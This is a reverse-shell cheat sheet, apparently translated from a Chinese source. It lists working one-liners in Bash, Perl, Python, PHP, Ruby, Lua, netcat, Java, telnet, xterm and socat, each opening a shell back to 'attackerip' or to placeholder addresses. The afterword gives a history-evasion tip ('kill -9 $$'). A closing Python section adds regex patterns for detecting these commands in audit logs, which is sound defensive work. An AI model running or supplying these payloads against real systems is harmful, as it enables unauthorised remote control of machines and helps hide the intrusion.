Common Reverse Shell Cheat Sheet

Keywords

Reverse shell, command execution, Remote Code Execution, Reverse Shell

A small number of these are bind (forward) shells rather than reverse shells.

References

http://hackerwing.com/2017/12/19/Reverse-Shell-%E5%A4%87%E5%BF%98%E5%BD%95/#more

My notes, sourced from redflog1
Reverse shell commands on Linux
https://mp.weixin.qq.com/s?__biz=MzA5MDUwMzM1Nw==&mid=2652481055&idx=1&sn=1051ab4a1a377f457e9897ee0050cfa2&chksm=8be7a7cdbc902edb43c33b465d138f37b54922d3fb6af024486127adcb47d66d43dd52f435d8&mpshare=1&scene=1&srcid=1230iue9wT08KqVDdzZSE8dM#rd

Main text

Commands

Bash

bash -i >& /dev/tcp/attackerip/8080 0>&1

Others

1.
exec 5<>/dev/tcp/127.0.0.1/8080
cat <&5 | while read line; do $line 2>&5 >&5; done

2.
exec 2>&0;0<&196;exec 196<>/dev/tcp/127.0.0.1/8080; sh <&196 >&196 2>&196

3.
rm /tmp/backpipe;mknod /tmp/backpipe p;/bin/bash 0</tmp/backpipe | nc 127.0.0.1 8080 1>/tmp/backpipe

4.
echo 'set s [socket 127.0.0.1 8080];while 42 { puts -nonewline $s "shell>";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh

5.
awk 'BEGIN {s = "/inet/tcp/0/127.0.0.1/8080"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null

Perl

perl -e 'use Socket;$i="attackerip";$p=5555;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

perl -e 'use Socket;$i="127.0.0.1";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"127.0.0.1:8080");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attackerip",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Lua

lua -e "require('socket');require('os');t=socket.tcp();t:connect('127.0.0.1','8080');os.execute('/bin/sh -i <&3 >&3 2>&3');"

PHP

php -r '$sock=fsockopen("attackerip",5555);exec("/bin/sh -i <&3 >&3 2>&3");'

Ruby

ruby -rsocket -e'f=TCPSocket.open("attackerip",5555).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

ruby -rsocket -e 'exit if fork;c=TCPSocket.new("127.0.0.1","8080");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

Netcat

nc -e /bin/sh attackerip 5555

If the installed netcat is a build without -e, you can still get a reverse shell like this:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attackerip 5555 >/tmp/f

Others

nc 127.0.0.1 8080 -c /bin/bash
nc 1.1.1.1 10086 -e /bin/sh

Java

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/attackerip/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Telnet

rm -f /tmp/p; mknod /tmp/p p && telnet attackerip 4444 0</tmp/p | /bin/bash 1>/tmp/p
Or:
telnet attackerip 4444 | /bin/bash | telnet attackerip 4445 # Remember to listen on your machine also on port 4445/tcp

Also

rm /tmp/backpipe;mknod /tmp/backpipe p && telnet 127.0.0.1 8080 0</tmp/backpipe | /bin/bash 1>/tmp/backpipe
Or
telnet 127.0.0.1 8080 | /bin/bash | telnet 192.168.149.133 9090

Xterm

xterm -display attackerip:1

Socat

socat tcp-connect:127.0.0.1:8080 exec:"bash -li",pty,stderr,setsid,sigint,sane

Afterword

Metasploit implements all of these through the popen3 function, so the shell history will certainly not record them.

kill -9 $$
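Since the afterword notes that shell history cannot be relied on to record these one-liners, the place to look for them is process-execution logging (auditd execve records, EDR command-line telemetry). The following is an added detection example, not part of the original cheat sheet: it matches the command-line shapes catalogued above against a constructed sample of logged command lines. The pattern names, the scan() helper and the sample log are assumptions made for this example.

```python
import re

# Patterns derived from the one-liner shapes listed on this page.
# Names are constructed for this example, not from any product or standard.
REVERSE_SHELL_PATTERNS = {
    "bash_dev_tcp": re.compile(r"/dev/tcp/\S+/\d+"),
    "nc_exec": re.compile(r"\bnc(at)?\b.*\s-[ec]\s+/bin/(ba)?sh"),
    "fifo_pipe_nc": re.compile(r"(mkfifo|mknod)\s+\S+.*\|\s*(nc|telnet)\b"),
    "socat_exec_shell": re.compile(r"\bsocat\b.*exec:\W?(ba)?sh"),
    "interp_socket_shell": re.compile(
        r"\b(python|perl|php|ruby|lua)\b.*(socket|fsockopen|TCPSocket)"
        r".*(/bin/(ba)?sh|subprocess|popen|exec\()"),
    "telnet_pipe_shell": re.compile(r"\btelnet\b.*\|\s*/bin/(ba)?sh"),
}


def classify(cmdline):
    """Return the names of every pattern a single logged command line matches."""
    return [name for name, rx in REVERSE_SHELL_PATTERNS.items() if rx.search(cmdline)]


def scan(lines):
    """Scan logged command lines (one per entry) and return (line, matches) for hits."""
    hits = []
    for line in lines:
        names = classify(line)
        if names:
            hits.append((line, names))
    return hits


# Constructed sample of command lines as an execve audit trail might record them
# (TEST-NET addresses; two benign lines included to show they are not flagged).
SAMPLE_LOG = [
    "bash -i >& /dev/tcp/203.0.113.5/8080 0>&1",
    "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 203.0.113.5 5555 >/tmp/f",
    "nc -e /bin/sh 203.0.113.5 5555",
    "socat tcp-connect:203.0.113.5:8080 exec:\"bash -li\",pty,stderr,setsid,sigint,sane",
    "ruby -rsocket -e 'exit if fork;c=TCPSocket.new(\"203.0.113.5\",\"8080\");"
    "while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'",
    "ls -la /var/log",
    "tar czf backup.tgz /etc",
]

if __name__ == "__main__":
    for line, names in scan(SAMPLE_LOG):
        print(names, line)
```

The regexes are deliberately broad on the shell-shape and narrow on the interpreter side; tune them against your own baseline of legitimate command lines before alerting on them.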